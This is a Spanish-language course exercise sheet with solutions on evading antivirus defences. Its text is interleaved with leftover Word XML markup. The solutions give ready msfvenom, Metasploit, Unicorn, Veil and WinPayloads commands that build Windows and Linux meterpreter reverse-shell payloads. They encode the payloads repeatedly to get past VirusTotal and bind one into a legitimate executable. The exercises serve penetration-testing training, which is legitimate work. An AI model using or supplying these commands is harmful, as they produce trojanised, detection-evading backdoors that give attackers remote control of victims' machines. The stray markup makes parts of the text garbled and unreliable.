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U1M8 - EJERCICIOS INTRODUCCIÓN A LA EVASIÓN DE DEFENSAS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Prerrequisitos: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Kali Linux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Ejercicio 1: msfvenom y metasploit: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Crea 2 payload que puedan ejecutarse saltando la mayor cantidad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posible de test de VirusTotal con técnicas como el cifrado, los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encoders y las iteraciones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El primer payload para Windows con msfvenom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El segundo payload para Linux con metasploit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Ejercicio 2: Crear ejecutables con los módulos de evasión de defensas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Windows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2.1 Crea un payload para Windows que pueda ejecutarse saltando la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mayor cantidad posible de test de VirusTotal usando un archivo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ejecutable legítimo con MSFvenom.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Ejercicio 3 - Unicorn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2.2 Crea un payload para Windows que pueda ejecutarse saltando la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mayor cantidad posible de test de VirusTotal con Unicorn.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Ejercicio 4 – Veil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2.3 Crea un payload para Windows que pueda ejecutarse saltando la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mayor cantidad posible de test de VirusTotal con Veil.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Ejercicio 5 - WinPayloads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ydw0no9u7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1: msfvenom y metasploit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Payload para Windows con msfvenom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Crear el payload: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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o payload_windows.exe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Esto generará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payload_windows.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> con el payload codificado.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422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Payload para Linux con Metasploit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Iniciar Metasploit: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msfconsole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Configurar y crear el payload:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Utilizaremos Metasploit para crear y manejar el payload de Linux.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payload/linux/x86/meterpreter/reverse_tcp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LHOST 192.168.1.69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LPORT 4444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 -f elf -o payload_linux.elf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payload/linux/x86/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Seleccionar el payload para Linux.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LHOST 192.168.1.69</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Configurar la dirección IP del atacante.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LPORT 4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Configurar el puerto de escucha.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 -f elf -o payload_linux.elf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Generar el archivo ELF con el payload.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660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1ycjgnvfb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2: Crear ejecutables con los módulos de evasión de defensas para Windows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Payload para Windows usando un archivo ejecutable legítimo con msfvenom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Crear el payload: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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=4444 -x /path/to/legitimate.exe -k -f exe -o evasive_payload.exe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Reemplaza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/path/to/legitimate.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> con la ruta de un ejecutable legítimo en tu sistema.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sxsg4dcjr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3: Unicorn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Payload para Windows con Unicorn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Instalar Unicorn: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https://github.com/trustedsec/unicorn.git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unicorn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Crear el payload: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unicorn.py windows/meterpreter/reverse_tcp 192.168.1.69 4444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Esto generará un script PowerShell y un archivo listener.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05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ufbv2aanl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4: Veil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Payload para Windows con Veil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Instalar Veil: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install veil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veil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Crear el payload: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 1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LHOST 192.168.1.69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LPORT 4444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3302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dtzzx7kvi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5: WinPayloads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Payload para Windows con WinPayloads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Instalar WinPayloads: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https://github.com/nccgroup/Winpayloads.git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Winpayloads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setup.sh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./setup.sh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Crear el payload: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WinPayloads.py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Sigue las instrucciones en pantalla para generar el payload.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